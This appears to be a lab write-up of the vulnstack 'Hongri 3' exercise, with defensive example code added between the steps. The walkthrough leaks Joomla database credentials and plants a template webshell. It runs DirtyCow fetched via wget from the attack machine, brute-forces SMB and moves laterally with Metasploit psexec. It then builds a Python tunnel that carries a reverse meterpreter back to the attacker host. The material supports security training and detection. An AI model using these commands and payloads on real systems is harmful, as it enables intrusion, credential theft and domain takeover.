Hongri 3 (Red Sun 3)
Lingjing platform: hongri3
This lab is a black-box test; no target-machine information is provided.

Environment: several target machines, both Windows and Linux, simulating a three-tier domain network with different host roles: an internet-facing host, a pivot host, internal hosts and a domain controller.
Goal: obtain control of the domain controller and find the important files on it, giving the practitioner hands-on penetration testing in something close to a real enterprise network.
Difficulty: higher than the first two labs and closer to a real red-team assessment; it demands broad penetration-testing skills.

Techniques involved:
1. Information gathering
   1) Network information gathering: scan the target network with tools to discover hosts, open ports and service versions, and map the target's topology and assets.
   2) Web information gathering: identify the CMS and framework the target site runs (Wappalyzer etc.) and look up their historical vulnerabilities to guide the later attack.
   3) System information gathering: once a host is compromised, collect the system version, user information and configuration files in preparation for privilege escalation.
2. Vulnerability exploitation
   1) Web vulnerabilities: exploit them to get a shell and control of the server.
   2) System vulnerabilities: privilege-escalation flaws and unpatched software on the system, used to raise privileges on the target.
   3) Middleware vulnerabilities: find and exploit flaws in the middleware the target runs.
3. Internal network penetration
   1) Set up a proxy: build a SOCKS proxy with a proxy tool so that other tools on the attack machine can reach the internal network.
4. Internal information gathering
   1) Scan the internal network for host IP addresses, open ports and service information, and draw the internal topology.
5. Lateral movement
6. Domain penetration
7. Persistence
8. Trace cleanup

Original lab project: http://vulnstack.qiyuanxuetang.net/vuln/
Target IP: 192.168.242.67
Kali: 192.168.188.129
CS server: 192.168.188.129
External host: joomla
fscan scan
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144759589-1149408480.png
There is a MySQL weak password; log in and take a look.
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144759109-69392958.png
Directory scan
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144758752-2063706757.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144758374-1789977989.png
Backend login
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144758021-785078424.png
Look for credentials in the database connected earlier: the joomla database has one user in each of am2zu_users and umnbt_users; change the one in am2zu_users.
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144757648-1870890036.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144757330-1208969578.png
Hashing script
Result: original password: abc123
bcrypt hash: $2y$10$41JzrIV.PAd4MKqDFxDKt.bD7LQk.Eyfq36rWjfBbm1hoScenBzjm
After replacing the stored password with this hash, log in to the backend with administrator/abc123.
The following is another method: use joomscan to find the configuration file and connect to the database with the credentials in it.
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144757009-191485803.png
Scan directly:

joomscan -u http://192.168.242.67/

[+] FireWall Detector
[++] Firewall not detected

[+] Detecting Joomla Version
[++] Joomla 3.9.12

[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable

[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.242.67/administrator/components
http://192.168.242.67/administrator/modules
http://192.168.242.67/administrator/templates
http://192.168.242.67/images/banners

[+] Checking apache info/status files
[++] Readable info/status files are not found

[+] admin finder
[++] Admin page : http://192.168.242.67/administrator/

[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.242.67/robots.txt

Interesting path found from robots.txt
http://192.168.242.67/joomla/administrator/
http://192.168.242.67/administrator/
http://192.168.242.67/bin/
http://192.168.242.67/cache/
http://192.168.242.67/cli/
http://192.168.242.67/components/
http://192.168.242.67/includes/
http://192.168.242.67/installation/
http://192.168.242.67/language/
http://192.168.242.67/layouts/
http://192.168.242.67/libraries/
http://192.168.242.67/logs/
http://192.168.242.67/modules/
http://192.168.242.67/plugins/
http://192.168.242.67/tmp/

[+] Finding common backup files name
[++] Backup files are not found

[+] Finding common log files name
[++] error log is not found

[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.242.67/configuration.php~

Your Report : reports/192.168.242.67/

Visit http://192.168.242.67/configuration.php~
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144756555-1667393717.png
Joomla! CMS configuration file backup leaked

Database:
public $dbtype = 'mysqli';                              // database type
public $host = 'localhost';                             // database host
public $user = 'testuser';                              // database user
public $password = 'cvcvgjASD!@';                       // database password
public $db = 'joomla';                                  // database name
public $dbprefix = 'am2zu_';                            // table prefix

Website configuration:
public $sitename = 'test';                              // site name
public $secret = 'gXN9Wbpk7ef3A4Ys';                    // Joomla secret (used for encryption)
public $log_path = '/var/www/html/administrator/logs';  // log path
public $tmp_path = '/var/www/html/tmp';                 // temporary file path

Connect to the database
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144756177-1870951432.png
The result is the same as with the previous method.
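Added example from the defender's side, not code from the original post: an audit that walks a local webroot and flags editor or backup copies of sensitive configuration files, the pattern behind the readable configuration.php~ above. The suffix list, the sample tree and the function names are my own assumptions for the example.

```python
import os
import tempfile

# Suffixes editors and admins leave behind next to the original file; "~" is the one
# that exposed configuration.php in this lab. Constructed list, extend as needed.
BACKUP_SUFFIXES = ("~", ".bak", ".old", ".orig", ".save", ".swp", ".txt", ".1")
# Files whose backup copies matter most (hypothetical list for the example).
SENSITIVE_FILES = ("configuration.php", "wp-config.php", ".env", "config.php")


def find_leaked_backups(webroot):
    """Return webroot-relative paths of files that look like backup copies of sensitive files."""
    leaked = []
    for dirpath, _, filenames in os.walk(webroot):
        for name in filenames:
            for base in SENSITIVE_FILES:
                # editor style: configuration.php~ or configuration.php.bak
                if name.startswith(base) and name[len(base):] in BACKUP_SUFFIXES:
                    leaked.append(os.path.relpath(os.path.join(dirpath, name), webroot))
                # vim swap style: .config.php.swp
                elif name == "." + base + ".swp":
                    leaked.append(os.path.relpath(os.path.join(dirpath, name), webroot))
    return sorted(leaked)


def build_sample_webroot():
    """Constructed sample tree mirroring the lab's leak: configuration.php~ beside configuration.php."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "administrator"))
    for rel in ("index.php", "configuration.php", "configuration.php~",
                "administrator/index.php", "administrator/.config.php.swp"):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write("<?php // sample\n")
    return root


if __name__ == "__main__":
    for path in find_leaked_backups(build_sample_webroot()):
        print("leaked backup copy:", path)
```

Run it against the real document root (the lab's is /var/www/html, per the leaked config) and remove or deny access to whatever it lists.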
getshell
Into the backend
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144755840-59338578.png
Templates
Open one and go to error.php; add a one-line webshell
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144755434-1360884719.png
Save, visit 192.168.242.67/templates/beez3/error.php and connect with AntSword
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144755047-70943763.png
But commands cannot be executed. I uploaded a Godzilla shell and used it to upload a backdoor and execute from there, but that did not seem to work either.
Upload a phpinfo file and open it to see which functions are disabled
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144754602-202257537.png
A lot of them are disabled. Browsing the files turned up a set of credentials
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144754176-2133955982.png
ssh
Try logging in over SSH
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144753788-1703052238.png
Check the account's privileges
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144753346-1039397687.png
Privilege escalation looks necessary.
Privilege escalation
Check the kernel version

$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

Try DirtyCow (CVE-2016-5195)
This article explains it in detail: 脏牛(DirtyCow)Linux本地提权漏洞复现(CVE-2016-5195) by 无名之辈。 on 博客园
On the target, just download it with wget; serve it over HTTP from Kali (firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195)
kali:
python -m http.server 8989   # serve HTTP from the directory that contains the zip
web host:
wget http://192.168.188.129:8989/dirtycow-master.zip
unzip dirtycow-master.zip
cd dirtycow-master
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty 123456
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144752987-198011226.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144752616-1768386902.png
Check privileges
id
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144752166-487458934.png
Same privileges as root.
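Added example, not the post's own code: a patch-level check for the kernel string above, comparing an RHEL/CentOS 6 release string against the release that carries the CVE-2016-5195 fix. The fixed release string is an assumption taken from the vendor errata; confirm it against your distribution's advisory, and note the comparison is only meaningful within the same kernel series.

```python
import re

# Assumed fixed release for CentOS/RHEL 6 (vendor errata for CVE-2016-5195);
# verify against your distribution's advisory before relying on it.
DIRTYCOW_FIXED_EL6 = "2.6.32-642.6.2.el6"

# The kernel string from the lab host, as printed above.
LAB_UNAME = ("Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP "
             "Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux")


def parse_kernel_release(release):
    """Split 'major.minor.patch-build.el6.x86_64' into (version, build) tuples that
    compare numerically; non-numeric parts such as el6 or x86_64 are dropped."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)-([\d.]+)", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    version = tuple(int(x) for x in m.group(1, 2, 3))
    build = tuple(int(x) for x in m.group(4).rstrip(".").split("."))
    return version, build


def vulnerable_to_dirtycow(uname_or_release, fixed_release=DIRTYCOW_FIXED_EL6):
    """True when the running kernel release is older than the fixed release.
    Accepts either a bare release string or full `uname -a` output."""
    parts = uname_or_release.split()
    release = parts[2] if parts[0] == "Linux" and len(parts) > 2 else parts[0]
    running_ver, running_build = parse_kernel_release(release)
    fixed_ver, fixed_build = parse_kernel_release(fixed_release)
    if running_ver != fixed_ver:
        return running_ver < fixed_ver
    # pad so that 431 vs 642.6.2 compares as (431, 0, 0) vs (642, 6, 2)
    width = max(len(running_build), len(fixed_build))
    running_build += (0,) * (width - len(running_build))
    fixed_build += (0,) * (width - len(fixed_build))
    return running_build < fixed_build


if __name__ == "__main__":
    print("lab kernel vulnerable:", vulnerable_to_dirtycow(LAB_UNAME))
```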
Information gathering
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144751852-234374672.png
Scan the 93 subnet; upload fscan (again served over HTTP for download)

./fscan -h 192.168.93.0/24

fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.93.10 is alive
(icmp) Target 192.168.93.30 is alive
(icmp) Target 192.168.93.20 is alive
(icmp) Target 192.168.93.100 is alive
(icmp) Target 192.168.93.120 is alive
[*] Icmp alive hosts len is: 5
192.168.93.120:80 open
192.168.93.100:80 open
192.168.93.20:80 open
192.168.93.120:22 open
192.168.93.10:135 open
192.168.93.30:135 open
192.168.93.30:139 open
192.168.93.20:139 open
192.168.93.10:139 open
192.168.93.10:445 open
192.168.93.20:1433 open
192.168.93.30:445 open
192.168.93.120:3306 open
192.168.93.20:445 open
192.168.93.20:5555 open
192.168.93.100:22 open
192.168.93.20:135 open
192.168.93.100:3306 open
192.168.93.10:88 open
[*] alive ports len is: 19
start vulscan
[*] NetInfo
[*]192.168.93.30 [->]win7 [->]192.168.93.30
[*] WebTitle http://192.168.93.20 code:404 len:315 title:Not Found
[*] NetInfo
[*]192.168.93.20 [->]win2008 [->]192.168.93.20
[*] NetInfo
[*]192.168.93.10 [->]WIN-8GA56TNV3MV [->]192.168.93.10
[*] OsInfo 192.168.93.10 (Windows Server 2012 R2 Datacenter 9600)
[*] OsInfo 192.168.93.20 (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
[*] OsInfo 192.168.93.30 (Windows 7 Professional 7601 Service Pack 1)
[*] NetBios 192.168.93.10 [+] DC:WIN-8GA56TNV3MV.test.org Windows Server 2012 R2 Datacenter 9600
[+] mysql 192.168.93.100:3306:root 123
[+] mysql 192.168.93.120:3306:root 123
[*] WebTitle http://192.168.93.120 code:200 len:16020 title:Home
[*] WebTitle http://192.168.93.100 code:200 len:16020 title:Home
已完成 17/19 [-] ssh 192.168.93.120:22 root Passw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods , no supported methods remain
已完成 17/19 [-] ssh 192.168.93.120:22 root a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods , no supported methods remain

Live hosts and open ports:

IP              Open ports
192.168.93.10   88, 135, 139, 445
192.168.93.20   80, 135, 139, 445, 1433
192.168.93.30   135, 139, 445
192.168.93.120  22, 80, 3306
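Added example, not part of the original writeup: a small parser that turns fscan's flat output into a per-host inventory plus a list of weak-credential findings, so a result like the one above can be kept as an asset record and diffed against the next scan. The regexes describe the line shapes of fscan 1.8.4 as printed above; the sample text is constructed from those lines, and the function and field names are mine.

```python
import re
from collections import defaultdict

# Constructed sample in the shape fscan 1.8.4 prints (lines taken from the scan above).
SAMPLE_OUTPUT = """\
192.168.93.120:80 open
192.168.93.20:80 open
192.168.93.10:135 open
192.168.93.20:139 open
192.168.93.10:139 open
192.168.93.10:445 open
192.168.93.20:1433 open
192.168.93.20:445 open
192.168.93.20:135 open
192.168.93.10:88 open
[*] NetInfo
[*]192.168.93.20 [->]win2008 [->]192.168.93.20
[*] OsInfo 192.168.93.10 (Windows Server 2012 R2 Datacenter 9600)
[*] NetBios 192.168.93.10 [+] DC:WIN-8GA56TNV3MV.test.org Windows Server 2012 R2 Datacenter 9600
[+] mysql 192.168.93.100:3306:root 123
[*] WebTitle http://192.168.93.120 code:200 len:16020 title:Home
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
PORT_RE = re.compile(r"^" + IP + r":(\d+) open$")                  # host:port open
HOST_RE = re.compile(r"^\[\*\]" + IP + r" \[->\](\S+)")              # NetInfo detail line
OS_RE = re.compile(r"^\[\*\] OsInfo (\S+) \((.+)\)$")               # OS fingerprint
DC_RE = re.compile(r"^\[\*\] NetBios (\S+) \[\+\] DC:(\S+)")         # domain controller flag
CRED_RE = re.compile(r"^\[\+\] (\w+) " + IP + r":(\d+):(\S+) (\S+)$")  # weak credential hit


def parse_fscan(text):
    """Return ({ip: {ports, hostname, os, dc}}, [(ip, port, service, user, password)])."""
    hosts = defaultdict(lambda: {"ports": set(), "hostname": None, "os": None, "dc": None})
    weak_creds = []
    for line in text.splitlines():
        line = line.strip()
        if m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := HOST_RE.match(line):
            hosts[m.group(1)]["hostname"] = m.group(2)
        elif m := OS_RE.match(line):
            hosts[m.group(1)]["os"] = m.group(2)
        elif m := DC_RE.match(line):
            hosts[m.group(1)]["dc"] = m.group(2)
        elif m := CRED_RE.match(line):
            service, ip, port, user, password = m.groups()
            hosts[ip]["ports"].add(int(port))
            weak_creds.append((ip, int(port), service, user, password))
    # sorted port lists keep the inventory stable for diffing between scans
    inventory = {ip: dict(info, ports=sorted(info["ports"])) for ip, info in hosts.items()}
    return inventory, weak_creds
```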
vshell check-in
Reverse connection; set up a listener
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144751493-126071793.png
Generate the implant
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144751104-219690188.png
The generated file is again transferred via Kali
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144750703-1289528440.png
Check-in
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144750330-2099126332.png
socks
We need to talk to the 93 subnet, so open a SOCKS proxy
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144750006-1368721280.png
On Kali, configure /etc/proxychains4.conf
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144749683-250281970.png
msf
proxychains4 msfconsole

But exploitation this way turned out to fail later; the proxy has to be set globally inside msf once it is running.
SMB brute force
Apart from .120, the other three hosts have 445 open, so try SMB credential brute-forcing (after a long run I found the password was not in my wordlist at all; I looked at the walkthrough and added it myself)
msfconsole
msf6 > setg Proxies socks5:192.168.188.129:9898
msf6 > setg ReverseAllowProxy true
msf6 > use auxiliary/scanner/smb/smb_login
msf6 > set RHOSTS 192.168.93.10
msf6 > set SMBUser administrator
msf6 > set PASS_FILE /mnt/hgfs/share/dictionary/keyboard.txt
msf6 > set STOP_ON_SUCCESS true
msf6 > set VERBOSE false
msf6 > set THREADS 3
msf6 > run

setg Proxies: send all msf traffic through the SOCKS5 proxy opened by vshell (192.168.188.129:9898)
setg ReverseAllowProxy: tells the msf handler that payload call-backs may also go through the proxy
auxiliary/scanner/smb/smb_login: auxiliary module that brute-forces SMB usernames and passwords
STOP_ON_SUCCESS: stop as soon as a correct password is found
VERBOSE: do not print too much detail
THREADS 3: three threads
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144749365-1144696359.png
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144748982-753312646.png
.10 is administrator / zxcASDqw123!!; .20 and .30 are administrator / 123qwe!ASD
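Added example from the defender's side, not part of the original writeup: a detection for the smb_login pattern above, a burst of failed network logons against one account followed by a success once STOP_ON_SUCCESS hits, run over constructed Windows Security events. In this lab the source address would be the web host 192.168.93.100, because the scan rides the SOCKS proxy on it; the event layout, threshold and function names are my assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample of Windows Security events in the shape that matters here:
# (timestamp, EventID, target user, source IP, logon type). 4625 = failed logon,
# 4624 = successful logon; logon type 3 = network, which is what SMB authentication produces.
SAMPLE_EVENTS = [
    ("2026-03-30 14:47:01", 4625, "administrator", "192.168.93.100", 3),
    ("2026-03-30 14:47:01", 4625, "administrator", "192.168.93.100", 3),
    ("2026-03-30 14:47:02", 4625, "administrator", "192.168.93.100", 3),
    ("2026-03-30 14:47:02", 4625, "administrator", "192.168.93.100", 3),
    ("2026-03-30 14:47:03", 4625, "administrator", "192.168.93.100", 3),
    ("2026-03-30 14:47:03", 4624, "administrator", "192.168.93.100", 3),  # the STOP_ON_SUCCESS hit
    ("2026-03-30 14:50:10", 4625, "bob", "192.168.93.30", 3),             # a single typo, not an attack
]


def detect_smb_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag (source, user) pairs with >= threshold failed network logons inside `window`,
    and record whether a successful logon from the same pair followed within the window."""
    alerts = []
    failures = {}  # (source, user) -> timestamps of recent failures
    for ts_str, event_id, user, src, logon_type in events:
        if logon_type != 3:
            continue
        ts = datetime.strptime(ts_str, "%Y-%m-%d %H:%M:%S")
        key = (src, user)
        if event_id == 4625:
            recent = [t for t in failures.get(key, []) if ts - t <= window] + [ts]
            failures[key] = recent
            if len(recent) == threshold:  # fire once, when the burst crosses the threshold
                alerts.append({"source": src, "user": user, "failures": len(recent),
                               "first": recent[0], "last": ts, "success_after": False})
        elif event_id == 4624:
            for alert in alerts:
                if (alert["source"], alert["user"]) == key and ts - alert["last"] <= window:
                    alert["success_after"] = True  # password found: treat as compromised
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(SAMPLE_EVENTS):
        print(alert)
```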
192.168.93.20: win2008
Lateral movement with msf psexec

msfconsole
msf6 > setg Proxies socks5:192.168.188.129:9898
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.93.20
msf6 > set SMBUser administrator
msf6 > set SMBPass 123qwe!ASD
msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp
msf6 > set LPORT 5555
msf6 > run

exploit/windows/smb/psexec: the lateral-movement exploit module
PAYLOAD windows/x64/meterpreter/bind_tcp: bind (forward) connection
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144748496-264104049.png
System information
systeminfo
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144748086-1969478392.png
win2008
Check the domain name
ipconfig /all
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144747704-1856423433.png
test.org
Ping it to see which IP it resolves to
ping test.org
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144747014-92029633.png
192.168.93.10 is the domain controller
192.168.93.30: win7
Same exploitation

msfconsole
msf6 > setg Proxies socks5:192.168.188.129:9898
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.93.30
msf6 > set SMBUser administrator
msf6 > set SMBPass 123qwe!ASD
msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp
msf6 > set LPORT 6666
msf6 > run
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144746661-1460974571.png
win7
192.168.93.10: domain controller

msfconsole
msf6 > setg Proxies socks5:192.168.188.129:9898
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.93.10
msf6 > set SMBUser administrator
msf6 > set SMBPass zxcASDqw123!!
msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp
msf6 > set LPORT 1111
msf6 > run

Tried it, but it does not work; the connection has to come back out in reverse.
See what is available
which python python3 perl ruby socat nc ncat netcat
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144746258-883445470.png
Python 2.7 and Perl are present; run this directly on the web host
python -c "
import socket, threading

def handle(client):
    # open the outbound leg to the attack machine; drop the client if that fails
    try:
        target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        target.connect(('192.168.188.129', 3434))
    except:
        client.close()
        return

    def forward(src, dst):
        # copy bytes one way until either side closes
        try:
            while True:
                data = src.recv(4096)
                if not data:
                    break
                dst.send(data)
        except:
            pass
        finally:
            src.close()
            dst.close()

    t1 = threading.Thread(target=forward, args=(client, target))
    t2 = threading.Thread(target=forward, args=(target, client))
    t1.daemon = True
    t2.daemon = True
    t1.start()
    t2.start()
    t1.join()
    t2.join()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(('0.0.0.0', 3434))
server.listen(5)
print('[+] Forwarding 0.0.0.0:3434 -> 192.168.188.129:3434')
while True:
    client, addr = server.accept()
    print('[+] Connection from', addr)
    t = threading.Thread(target=handle, args=(client,))
    t.daemon = True
    t.start()
" &

This is a TCP port-forwarding script (also called a tunnel or proxy).
What it does: traffic arriving on port 3434 of the web server is forwarded unchanged to port 3434 of the attack machine.
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144745921-1279009941.png
kali:
# start msf on the attack machine (new terminal)
msfconsole
# set the global proxy inside msf
msf6 > setg Proxies socks5:192.168.188.129:9898
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS 192.168.93.10
msf6 > set SMBUser administrator
msf6 > set SMBPass zxcASDqw123!!
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.93.100   # internal IP of the web server
msf6 > set LPORT 3434
msf6 > set target 2               # Native upload
msf6 > run

PAYLOAD windows/x64/meterpreter/reverse_tcp: the domain controller must connect back out to the attack machine
LHOST 192.168.93.100: the domain controller connects to the web host rather than directly to the attack machine; because of the port forward, reaching port 3434 on the web host is the same as reaching port 3434 on the attack machine
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144745583-1619490914.png
192.168.93.120
Port 22 is open; try the credentials obtained earlier
wwwuser/wwwuser_123Aqx
ssh -p 22 wwwuser@192.168.93.120
https://img2024.cnblogs.com/blog/3540423/202603/3540423-20260330144745139-694685260.png